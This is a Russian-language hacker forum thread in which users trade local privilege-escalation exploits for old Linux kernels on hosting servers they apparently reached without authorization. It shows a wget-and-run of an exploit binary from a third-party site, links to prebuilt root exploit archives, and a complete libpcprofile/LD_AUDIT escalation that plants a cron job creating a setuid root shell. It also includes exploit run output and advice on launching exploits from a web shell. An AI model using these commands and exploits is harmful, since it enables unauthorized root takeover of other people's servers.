повышение прав [задай вопрос - получи ответ]

wget http://www.interiordelduque.com/userfiles/image/2.6.18
chmod +x 2.6.18
./2.6.18

 

Linux hosting 2.6.26-1-686 #1 SMP Fri Mar 13 18:08:45 UTC 2009 i686

Под это есть что-то?

 

sh: ./2.6.9-55-2007-prv8: cannot execute binary file


Мне бы 2.6.9-89.0.23.EL #1 Wed Mar 17 06:22:05 EDT 2010 i686 пробить.

 

ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;

ответ сервера покажи

ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;

ответ сервера покажи

 

$ ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
total 26948
3637249 drwxr-xr-x 3 root root 4096 Apr 8 2009 .
2 drwxr-xr-x 24 root root 4096 Apr 8 2009 ..
3637250 -rw-r--r-- 1 root root 723178 Feb 11 2008 System.map-2.6.18-6-686
3637268 -rw-r--r-- 1 root root 928033 Mar 14 2009 System.map-2.6.26-1-686
3637251 -rw-r--r-- 1 root root 70682 Feb 11 2008 config-2.6.18-6-686
3637269 -rw-r--r-- 1 root root 91640 Mar 14 2009 config-2.6.26-1-686
3637254 drwxr-xr-x 2 root root 4096 Apr 8 2009 grub
3637267 -rw-r--r-- 1 root root 5259149 Apr 8 2009 initrd.img-2.6.18-6-686
3637266 -rw-r--r-- 1 root root 5259970 Apr 8 2009 initrd.img-2.6.18-6-686.bak
3637272 -rw-r--r-- 1 root root 6194894 Apr 8 2009 initrd.img-2.6.26-1-686
3637270 -rw-r--r-- 1 root root 6194909 Apr 8 2009 initrd.img-2.6.26-1-686.bak
3637252 -rw-r--r-- 1 root root 1260861 Feb 11 2008 vmlinuz-2.6.18-6-686
3637253 -rw-r--r-- 1 root root 1506512 Mar 14 2009 vmlinuz-2.6.26-1-686
12697846 -rw-r--r-- 1 root root 5440 Jan 4 2009 /lib/libpcprofile.so
12697768 -rwxr-xr-x 1 root root 113248 Jan 4 2009 /lib/ld-2.7.so
12697649 lrwxrwxrwx 1 root root 9 Apr 8 2009 /lib/ld-linux.so.2 -> ld-2.7.so

 

total 55852
2 drwxr-xr-x 4 root root 8192 Mar 3 06:11 .
2 drwxr-xr-x 27 root root 4096 Jun 8 01:19 ..
6036 -rw-r--r-- 1 root root 770652 Feb 18 08:41 System.map-2.6.9-100.EL
14 -rw-r--r-- 1 root root 749462 Aug 12 2006 System.map-2.6.9-42.EL
18 -rw-r--r-- 1 root root 754505 Jun 26 2007 System.map-2.6.9-55.0.2.EL
6031 -rw-r--r-- 1 root root 754717 Sep 28 2007 System.map-2.6.9-55.0.9.EL
10042 -rw-r--r-- 1 root root 759989 Dec 19 2007 System.map-2.6.9-67.0.1.EL
10062 -rw-r--r-- 1 root root 760559 Jul 24 2008 System.map-2.6.9-67.0.22.EL
10047 -rw-r--r-- 1 root root 759989 Feb 3 2008 System.map-2.6.9-67.0.4.EL
10087 -rw-r--r-- 1 root root 780664 May 1 2009 System.map-2.6.9-78.0.22.EL
10077 -rw-r--r-- 1 root root 780400 Nov 20 2008 System.map-2.6.9-78.0.8.EL
2009 -rw-r--r-- 1 root root 768660 Nov 4 2009 System.map-2.6.9-89.0.16.EL
2019 -rw-r--r-- 1 root root 768688 Jan 8 2010 System.map-2.6.9-89.0.19.EL
2029 -rw-r--r-- 1 root root 768822 Mar 17 2010 System.map-2.6.9-89.0.23.EL
2034 -rw-r--r-- 1 root root 768853 May 6 2010 System.map-2.6.9-89.0.25.EL
2039 -rw-r--r-- 1 root root 768881 Aug 20 2010 System.map-2.6.9-89.0.28.EL
10097 -rw-r--r-- 1 root root 768504 Aug 24 2009 System.map-2.6.9-89.0.9.EL
2049 -rw-r--r-- 1 root root 768881 Sep 28 2010 System.map-2.6.9-89.29.1.EL
2054 -rw-r--r-- 1 root root 769059 Oct 20 2010 System.map-2.6.9-89.31.1.EL
2059 -rw-r--r-- 1 root root 769059 Dec 2 2010 System.map-2.6.9-89.33.1.EL
6027 -rw-r--r-- 1 root root 769061 Jan 19 01:06 System.map-2.6.9-89.35.1.EL
6025 -rwxr--r-- 1 root root 6144 Jul 30 2007 aquota.user
6037 -rw-r--r-- 1 root root 51676 Feb 18 08:41 config-2.6.9-100.EL
15 -rw-r--r-- 1 root root 50333 Aug 12 2006 config-2.6.9-42.EL
19 -rw-r--r-- 1 root root 50432 Jun 26 2007 config-2.6.9-55.0.2.EL
6032 -rw-r--r-- 1 root root 50432 Sep 28 2007 config-2.6.9-55.0.9.EL
10043 -rw-r--r-- 1 root root 50924 Dec 19 2007 config-2.6.9-67.0.1.EL
10063 -rw-r--r-- 1 root root 50925 Jul 24 2008 config-2.6.9-67.0.22.EL
10048 -rw-r--r-- 1 root root 50924 Feb 3 2008 config-2.6.9-67.0.4.EL
10088 -rw-r--r-- 1 root root 51502 May 1 2009 config-2.6.9-78.0.22.EL
10078 -rw-r--r-- 1 root root 51501 Nov 20 2008 config-2.6.9-78.0.8.EL
2010 -rw-r--r-- 1 root root 51614 Nov 4 2009 config-2.6.9-89.0.16.EL
2020 -rw-r--r-- 1 root root 51614 Jan 8 2010 config-2.6.9-89.0.19.EL
2030 -rw-r--r-- 1 root root 51614 Mar 17 2010 config-2.6.9-89.0.23.EL
2035 -rw-r--r-- 1 root root 51645 May 6 2010 config-2.6.9-89.0.25.EL
2040 -rw-r--r-- 1 root root 51645 Aug 20 2010 config-2.6.9-89.0.28.EL
18073 -rw-r--r-- 1 root root 51613 Aug 24 2009 config-2.6.9-89.0.9.EL
2050 -rw-r--r-- 1 root root 51645 Sep 28 2010 config-2.6.9-89.29.1.EL
2055 -rw-r--r-- 1 root root 51645 Oct 20 2010 config-2.6.9-89.31.1.EL
2060 -rw-r--r-- 1 root root 51645 Dec 2 2010 config-2.6.9-89.33.1.EL
6028 -rw-r--r-- 1 root root 51645 Jan 19 01:06 config-2.6.9-89.35.1.EL
12049 drwxr-xr-x 2 root root 1024 Mar 3 06:11 grub
6040 -rw-r--r-- 1 root root 593873 Mar 3 06:11 initrd-2.6.9-100.EL.img
17 -rw-r--r-- 1 root root 399475 Jul 28 2007 initrd-2.6.9-42.EL.img
21 -rw-r--r-- 1 root root 588215 Jul 28 2007 initrd-2.6.9-55.0.2.EL.img
6034 -rw-r--r-- 1 root root 588204 Sep 29 2007 initrd-2.6.9-55.0.9.EL.img
10046 -rw-r--r-- 1 root root 592220 Dec 22 2007 initrd-2.6.9-67.0.1.EL.img
10066 -rw-r--r-- 1 root root 592219 Jul 25 2008 initrd-2.6.9-67.0.22.EL.img
10051 -rw-r--r-- 1 root root 592222 Feb 5 2008 initrd-2.6.9-67.0.4.EL.img
10091 -rw-r--r-- 1 root root 592902 Jun 8 2009 initrd-2.6.9-78.0.22.EL.img
10081 -rw-r--r-- 1 root root 592859 Nov 21 2008 initrd-2.6.9-78.0.8.EL.img
2013 -rw-r--r-- 1 root root 593352 Nov 5 2009 initrd-2.6.9-89.0.16.EL.img
2023 -rw-r--r-- 1 root root 593344 Jan 10 2010 initrd-2.6.9-89.0.19.EL.img
2033 -rw-r--r-- 1 root root 593542 Mar 21 2010 initrd-2.6.9-89.0.23.EL.img
2038 -rw-r--r-- 1 root root 593530 May 9 2010 initrd-2.6.9-89.0.25.EL.img
2043 -rw-r--r-- 1 root root 593592 Aug 24 2010 initrd-2.6.9-89.0.28.EL.img
18076 -rw-r--r-- 1 root root 593358 Aug 26 2009 initrd-2.6.9-89.0.9.EL.img
2053 -rw-r--r-- 1 root root 593576 Sep 30 2010 initrd-2.6.9-89.29.1.EL.img
2058 -rw-r--r-- 1 root root 593565 Oct 21 2010 initrd-2.6.9-89.31.1.EL.img
2063 -rw-r--r-- 1 root root 593569 Jan 12 05:52 initrd-2.6.9-89.33.1.EL.img
6035 -rw-r--r-- 1 root root 593570 Jan 21 05:36 initrd-2.6.9-89.35.1.EL.img
11 drwx------ 2 root root 12288 Jul 28 2007 lost+found
12 -rw-r--r-- 1 root root 9371 Aug 13 2006 message
13 -rw-r--r-- 1 root root 9371 Aug 13 2006 message.ja
6026 -rwxr--r-- 1 root root 32 Jul 30 2007 quota.user
6038 -rw-r--r-- 1 root root 67797 Feb 18 08:41 symvers-2.6.9-100.EL.gz
10044 -rw-r--r-- 1 root root 64308 Dec 19 2007 symvers-2.6.9-67.0.1.EL.gz
10064 -rw-r--r-- 1 root root 64329 Jul 24 2008 symvers-2.6.9-67.0.22.EL.gz
10049 -rw-r--r-- 1 root root 64308 Feb 3 2008 symvers-2.6.9-67.0.4.EL.gz
10089 -rw-r--r-- 1 root root 66266 May 1 2009 symvers-2.6.9-78.0.22.EL.gz
10079 -rw-r--r-- 1 root root 66235 Nov 20 2008 symvers-2.6.9-78.0.8.EL.gz
2011 -rw-r--r-- 1 root root 67596 Nov 4 2009 symvers-2.6.9-89.0.16.EL.gz
2021 -rw-r--r-- 1 root root 67596 Jan 8 2010 symvers-2.6.9-89.0.19.EL.gz
2031 -rw-r--r-- 1 root root 67606 Mar 17 2010 symvers-2.6.9-89.0.23.EL.gz
2036 -rw-r--r-- 1 root root 67650 May 6 2010 symvers-2.6.9-89.0.25.EL.gz
2041 -rw-r--r-- 1 root root 67650 Aug 20 2010 symvers-2.6.9-89.0.28.EL.gz
18074 -rw-r--r-- 1 root root 67596 Aug 24 2009 symvers-2.6.9-89.0.9.EL.gz
2051 -rw-r--r-- 1 root root 67650 Sep 28 2010 symvers-2.6.9-89.29.1.EL.gz
2056 -rw-r--r-- 1 root root 67667 Oct 20 2010 symvers-2.6.9-89.31.1.EL.gz
2061 -rw-r--r-- 1 root root 67701 Dec 2 2010 symvers-2.6.9-89.33.1.EL.gz
6029 -rw-r--r-- 1 root root 67701 Jan 19 01:07 symvers-2.6.9-89.35.1.EL.gz
6039 -rw-r--r-- 1 root root 1538264 Feb 18 08:41 vmlinuz-2.6.9-100.EL
16 -rw-r--r-- 1 root root 1504101 Aug 12 2006 vmlinuz-2.6.9-42.EL
20 -rw-r--r-- 1 root root 1511833 Jun 26 2007 vmlinuz-2.6.9-55.0.2.EL
6033 -rw-r--r-- 1 root root 1511602 Sep 28 2007 vmlinuz-2.6.9-55.0.9.EL
10045 -rw-r--r-- 1 root root 1518785 Dec 19 2007 vmlinuz-2.6.9-67.0.1.EL
10065 -rw-r--r-- 1 root root 1519323 Jul 24 2008 vmlinuz-2.6.9-67.0.22.EL
10050 -rw-r--r-- 1 root root 1518757 Feb 3 2008 vmlinuz-2.6.9-67.0.4.EL
10090 -rw-r--r-- 1 root root 1545940 May 1 2009 vmlinuz-2.6.9-78.0.22.EL
10080 -rw-r--r-- 1 root root 1545983 Nov 20 2008 vmlinuz-2.6.9-78.0.8.EL
2012 -rw-r--r-- 1 root root 1536244 Nov 4 2009 vmlinuz-2.6.9-89.0.16.EL
2022 -rw-r--r-- 1 root root 1536247 Jan 8 2010 vmlinuz-2.6.9-89.0.19.EL
2032 -rw-r--r-- 1 root root 1536228 Mar 17 2010 vmlinuz-2.6.9-89.0.23.EL
2037 -rw-r--r-- 1 root root 1536380 May 6 2010 vmlinuz-2.6.9-89.0.25.EL
2042 -rw-r--r-- 1 root root 1536716 Aug 20 2010 vmlinuz-2.6.9-89.0.28.EL
18075 -rw-r--r-- 1 root root 1533159 Aug 24 2009 vmlinuz-2.6.9-89.0.9.EL
2052 -rw-r--r-- 1 root root 1536664 Sep 28 2010 vmlinuz-2.6.9-89.29.1.EL
2057 -rw-r--r-- 1 root root 1536908 Oct 20 2010 vmlinuz-2.6.9-89.31.1.EL
2062 -rw-r--r-- 1 root root 1536830 Dec 2 2010 vmlinuz-2.6.9-89.33.1.EL
6030 -rw-r--r-- 1 root root 1536995 Jan 19 01:06 vmlinuz-2.6.9-89.35.1.EL
131202 lrwxrwxrwx 1 root root 16 Dec 17 2007 /lib/libpcre.so.0 -> libpcre.so.0.0.1
133814 -rwxr-xr-x 1 root root 65560 Nov 29 2007 /lib/libpcre.so.0.0.1
131074 -rwxr-xr-x 1 root root 112212 Feb 18 02:45 /lib/ld-2.3.4.so
132966 lrwxrwxrwx 1 root root 11 Mar 3 01:22 /lib/ld-linux.so.2 -> ld-2.3.4.so
132951 lrwxrwxrwx 1 root root 13 Jul 28 2007 /lib/ld-lsb.so.3 -> ld-linux.so.2

 

Скачай архив:

Code:

http://files.webi.ru/m_down/r00t.rar.html

файл с архива r00t.sh закачай на сервер и выполни следующие команды:

Code:

1. chmod +x r00t.sh
2. ./r00t.sh

3. whoami

в ответ получишь:
root

 

не пробить

 

sh-3.2$ ./r00t.sh
./r00t.sh: line 30: gcc: command not found
./r00t.sh: line 42: gcc: command not found
./r00t.sh: line 43: gcc: command not found
./r00t.sh: line 48: ./sh: No such file or directory

Вот что получаю в ответ.

 

на сервере нет gcc...он скомпилировать сплойт не может

Вот вариант, в котором gcc не нужен:

PHP:

Убираем маску прав доступа для создаваемых файлов (при umask 0 файлы будут создаваться по умолчанию с правами "-rw-rw-rw-")

   $ umask 0

Для атаки будем использовать стандартную библиотеку профилирования libpcprofile, входящую в комплект libc:

   $ dpkg -S /lib/libpcprofile.so
   libc6: /lib/libpcprofile.so

   $ ls -l /lib/libpcprofile.so
   -rw-r--r-- 1 root root 5496 2010-10-12 03:32 /lib/libpcprofile.so

Код инициализации libpcprofile не проверяет различия эффективного и текущего идентификатора пользователя, но при этом позволяет создать лог-файл, который можно создать в любой системной директории:

   $ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

   ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.

Несмотря на вывод ошибки, процедура инициализации выполнилась и в директории /etc/cron.d был создан лог-файл:

   $ ls -l /etc/cron.d/exploit
   -rw-rw-rw- 1 root taviso 65 2010-10-21 14:22 /etc/cron.d/exploit

Как видно, права доступа на созданный файл, позволяют любому пользователю записать в него любые данные, которые затем будут выполнены системой cron от пользователя root. Например:

   $ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit

Через пару минут наблюдаем:

   $ ls -l /tmp/exploit
   ls: cannot access /tmp/exploit: No such file or directory
   ...
   $ ls -l /tmp/exploit
   -rwsr-xr-x 1 root root 83888 2010-10-21 14:25 /tmp/exploit

   $ /tmp/exploit
   # whoami
   root


Если команда dpkg поддерживается то порутаешь...

 

Чем можно порутать? sendpage не прокатил.

 

какой из ? их 3 как бы...все пробовал ?

 

есть вопрос:
ставлю эксплоит Kallsyms
выдает
sh: no job control in this shell
sh-3.2# exit
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-128.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff8030d360
$$$ dummy_security_ops->ffffffff80496c00
$$$ capability_ops->ffffffff8030ec20
$$$ selinux_enforcing->ffffffff80499960
$$$ audit_enabled->ffffffff80485124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 ppPpPPpPPPpP

вроде как прокатил
проверяю
id,whoami
пишет command not found
ядро старое
2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64
че за ерунда не пойму?

 

не знаю, не встречалось....возможно баш слетает...
вот попробуй этот:
http://turboupload.com/ndbm663kbwft
в архиве 2 скомпиленых сплойта....на каждый используй: chmod +x name_file
и запусти.

 

Спасибо.
самое интенерсное в том что именно не все команды (открытие портов и т.д все ок) а важные
id, и т.д не выполняются) весь google пререрыл но так и не понятно. если хочешь в личку кину попробуй.
Добавлю
gcc,locale bind-back connect и все такое не катит.
Вот как тут быть е...ть.

 

есть под это?

 

Ну давай попробую, если что получится - отпишусь!

а что пробовал ?
асидбичес, роберт ю сак, фулл нелсон....выбора много...а справятся или нет - уже зависит от системы

 

кааааак??????узнать то???
если не бинд-и т.д команды не выполняються.
пробовал руткит, putty курит......Как?

 

Пробовал запуск сплоитов из-под веба? На рдоте есть ман,если не пробывал...
P.S линя можно переписать как угодно, что-то вырезать, а что-то добавить...поэтому могут и не работать многие привычные команды...

 

по подробнее, ссыль если можно (какие команды . в google искал все не то)